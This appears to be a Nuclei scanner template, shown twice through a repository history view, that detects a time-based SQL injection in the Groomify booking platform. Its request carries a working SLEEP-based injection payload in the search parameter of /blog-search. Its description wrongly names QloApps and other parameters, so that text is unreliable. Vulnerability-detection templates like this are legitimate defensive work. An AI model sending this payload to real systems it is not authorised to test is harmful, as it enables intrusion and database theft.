nuclei-templates/http/vulnerabilities/other/groomify-sqli.yaml

id: groomify-sqli

info:
  name: Groomify v1.0 - SQL Injection Vulnerability
  author: theamanrawat
  severity: high
  description: |
    An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.
  reference:
    - https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
    - https://vulners.com/zdt/1337DAY-ID-38799
  metadata:
    verified: "true"
    max-request: 1
  tags: sqli,groomify,unauth

http:
  - raw:
      - |
        @timeout: 25s
        GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body, 'value=\"deneme')
        condition: and

# digest: 4b0a00483046022100fda9980ba40b20fb868d13705d7db4a186fc38bee4f6b9830a2be5fc925a49c2022100e4e368ed18b2edf18a26b2f062058ef20c8627510f6e800b2904103ce46e744b:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: groomify-sqli`

			`info:`
			`name: Groomify v1.0 - SQL Injection Vulnerability`
			`author: theamanrawat`
			`severity: high`
			`description: \|`
			`An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.`
			`reference:`
			`- https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#`
			`- https://vulners.com/zdt/1337DAY-ID-38799`
			`metadata:`
			`verified: "true"`
			`max-request: 1`
			`tags: sqli,groomify,unauth`

			`http:`
			`- raw:`
			`- \|`
			`@timeout: 25s`
			`GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- duration>=6`
			`- status_code == 200`
			`- contains(header, "text/html")`
			`- contains(body, 'value=\"deneme')`
			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100fda9980ba40b20fb868d13705d7db4a186fc38bee4f6b9830a2be5fc925a49c2022100e4e368ed18b2edf18a26b2f062058ef20c8627510f6e800b2904103ce46e744b:922c64590222798bb761d5b6d8e72950`